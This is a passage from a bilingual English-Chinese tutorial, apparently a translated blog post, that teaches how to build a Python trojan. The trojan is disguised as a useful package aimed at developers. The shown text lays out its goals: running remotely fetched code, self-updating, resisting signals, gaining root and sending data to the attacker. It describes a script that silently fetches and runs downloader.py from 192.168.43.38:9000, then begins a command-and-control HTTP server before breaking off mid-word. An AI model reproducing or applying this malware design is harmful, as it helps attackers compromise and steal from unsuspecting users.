python木马程序设计_基于HTTP的Python特洛伊木马程序，用于远程系统取证和特权转移

python木马程序设计

总览 (Overview)

In this article, we will be building a python based trojan that does the following:

在本文中，我们将构建一个执行以下操作的基于python的木马：

1. Download remotely unrelated code to the trojan and run it
   将与远程无关的代码下载到木马并运行
2. Update code downloaded in (1)
   更新代码下载于(1)
3. Update itself
   自我更新
4. Rerun itself (immune to any signal except SIGKILL)
   重新运行自身(不受SIGKILL干扰)
5. Acquire and transfer root privileges (and thus do about anything on the target machine)
   获取并转移root特权(从而在目标计算机上执行任何操作)
6. Send data over HTTP to the attacker
   通过HTTP将数据发送给攻击者

And we begin with a simple assumption: the target executes some code that is beneficial to it. It might be anything like a python package serving to do some task the user thinks is worth doing.

我们从一个简单的假设开始：目标执行一些对其有利的代码。 它可能类似于python包，用于执行用户认为值得做的某些任务。

Source code: Github

源代码： Github

介绍 (Introduction)

Trojans are powerful because they look nice and are one of the foremost candidates of evading suspicion. Once run, they get about their malicious intent while looking perfectly fine to the attacker. More so, since targets (especially developers) are usually not suspicious of grabbing open-source/packages code and running it. It might be a good entry point for our exploit.

特洛伊木马之所以强大，是因为它们看起来不错，并且是逃避怀疑的首要候选者之一。 一旦运行，他们就可以了解恶意意图，同时对攻击者看起来还不错。 更重要的是，由于目标(尤其是开发人员) 通常并不怀疑获取开源代码/程序包代码并运行它。 对于我们的漏洞利用来说，这可能是一个很好的切入点。

好的代码 (The ‘good’ code)

The good code is simple. It does what the target intends it to do. It might range across a variety of things and span a whole package; the bigger the codebase, the subtler it is to spot activity. We’ll skip that part and write a simple code that prints something.

好的代码很简单。 它完成了目标打算执行的操作。 它可能涉及多种事物，并且涉及整个软件包。 代码库越大，发现活动就越微妙。 我们将跳过这一部分，并编写一个简单的代码来打印一些内容。

The good code with somewhat bad intents.

好的代码，意图有些不好。

To the target, this script should do what it is meant to (as in printing a simple line in our case) and exit peacefully. Apart from it, the main stuff here is the other stuff. The script builds a directory (in the normal case, you would want the working directory to be somewhere hidden. I’ll skip that for conciseness and obviousness of doing so) downloaded`, switches to it, and makes a cURL request (read more about cURL here) to some server at http://192.168.43.38:9000/downloader.py and downloads the content returned to a python script downloader.py . It then fires the command python3 downloader.py and peacefully exits. Since Popen was used, the child process (running downloader.py) disassociates from the parent (good.py)on the parent’s exit and associates with the init. So effectively, it becomes a separate process. The function run_command() is the python equivalent of a shell. It runs the specified command and returns the output from STDOUT or what you would have received had you used a shell.

对于目标，此脚本应按其意图(例如，在本例中为打印简单行)执行操作，然后和平退出。 除此之外，这里的主要内容是其他内容。 该脚本构建一个目录(通常情况下，您希望工作目录位于某个隐藏的位置。为简洁起见，我将跳过该目录)，然后downloaded并切换到该目录并发出cURL请求(了解更多信息)。有关cURL的信息 )到位于http://192.168.43.38:9000/downloader.py某个服务器，然后将返回的内容下载到python脚本downloader.py 。 然后它触发命令python3 downloader.py并和平退出。 由于Popen使用，子进程(运行downloader.py )从父(解离good.py )在父母的出口和同伙与init 。 如此有效，它成为一个单独的过程。 函数run_command()与shell的python等价。 它运行指定的命令并返回STDOUT的输出，或者返回您使用Shell会收到的输出。

Now is the time to configure this http://192.168.43.38:9000.

现在是时候配置此http://192.168.43.38:9000.

服务器端 (Server end)

The idea is to build a server that automatically pushes code to the remote end. It will be later used to update code in real-time, transfer files, commands, and a lot more. All we need to do is to configure a HTTP server capable of handling POST and GET.

这个想法是建立一个自动将代码推送到远程端的服务器。 稍后将用于实时更新代码，传输文件，命令等。 我们需要做的就是配置一个能够处理POST和GET的HTTP服务器。

basic HTTP server skeleton in setup_server.py

setup_server.py中的基本HTTP服务器框架

A HTTPServer in python runs on two pieces of information: where to put it up and what to do on interaction. The former part is handled by ('192.168.43.38', 9000) which serves to bind the server to port 9000 of the machine and192.168.43.38 is the local IP. The latter part is handled by a separate class extending BaseHTTPRequestHandler that defines functionality for POST and GET. The _set_response() function serves to send mandatory HTTP header information (header, code 200 representing success, and end header representing the end of header). Since we shall be dealing with text data, setting the Content-type to text/html is fine. Now to add the two main functions.

python中的HTTPServer在两条信息上运行：放置在何处以及如何进行交互。 前一部分由('192.168.43.38', 9000)处理，该部分用于将服务器绑定到计算机的端口9000 ，而192.168.43.38是本地IP。 后一部分由单独的扩展BaseHTTPRequestHandler类处理，该类定义了POST和GET功能。 _set_response()函数用于发送强制性的HTTP标头信息(标头，表示成功的代码200和标头结尾的结束标头)。 由于我们将处理文本数据，因此将Content-type设置为text/html很好。 现在添加两个主要功能。

GE